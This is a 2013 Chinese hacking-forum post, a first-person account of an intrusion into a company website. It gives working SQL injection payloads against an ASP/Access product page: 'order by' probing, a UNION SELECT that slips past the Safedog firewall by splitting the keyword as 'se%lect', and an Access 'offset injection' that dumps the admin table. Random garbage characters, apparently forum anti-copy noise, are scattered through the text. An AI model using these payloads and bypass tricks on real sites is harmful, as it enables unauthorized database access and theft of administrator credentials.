找回密码
 立即注册
查看: 3023|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
打开网站,一个企业站。' r' T: B/ u/ ?
+ Q; i# t9 {3 N+ [, a5 H& t' |7 c6 m
1 I  e- J! N0 D/ k9 ^4 {) `& R
顺手加个admin
3 [- z: \, ~- Z, K1 g$ |3 I6 T" m) y

$ S  t% J1 R, K  k默认后台。6 d2 W, V, A7 C: a- q5 S" u
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​2 X  a! I) |; u& Y2 Z# ^
2 o/ D  {6 ^5 w& B
2 S% p( D8 G7 p; f9 K0 U
' {3 O6 e" I# J( C
所以就不用御剑扫了,待会直接封IP。2 q8 z0 x, l3 V" R( J. B
% t: p+ t% Z# h3 d
用order by语句判断是否存在注入。7 z) K( ]8 g/ h% m+ [+ ?
http://www.xxx.com /product_show.asp?id=997 order by 1
% @& S' O0 K. J+ t) X; f* Hhttp://www.xxx.com /product_show.asp?id=997 order by 1005 t- r! @  y" [! ]' o
现在存在注入,经测试后发现是9个字段。
( F# t4 K7 W# B! y
7 D; b0 e1 g) |8 ^: v, ?7 t接下来进行联合查询,猜是否存在admin表。+ D3 c' I$ g1 b& M8 n4 o; u' w
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
1 p3 c+ `  I5 i6 G8 h8 o" r$ b) z& T4 J# Z" {* d/ Y
6 P. K0 c4 p7 n2 ]7 n
2 z$ [' h, N9 N9 h
在select中间加个%,se%lect绕过安全狗。3 W: {: I- z) V* l/ T/ m8 n* C( {

' h3 H( ]( l% _7 }! Q1 q  F% O5 N2 G( c8 F- C
发现存在admin表,然后开始手工猜常用的字段。
. Y3 e. I' p2 A8 @9 o9 |% b7 D纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
; e3 \; e2 ?$ n! T5 |  J! B
/ D6 [5 g0 H& y( y/ m突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
7 M( y6 r9 G7 a( n5 B" }& f 1 \. U* \$ T6 d: g" V" J+ L8 C1 Q
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
! X! l- u0 S8 M1 S4 yhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
8 Q/ A- r) x0 N* A5 i) v# n好了,敏感内容出显了。​
1 k: U( |# r' P7 e+ v+ i( z: _; h6 W2 r3 A' V* M5 U, u% m

' C9 Y- S. e$ A5 E# Y/ X8 L1 B: K! F- F/ O6 Z# O9 ^# z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表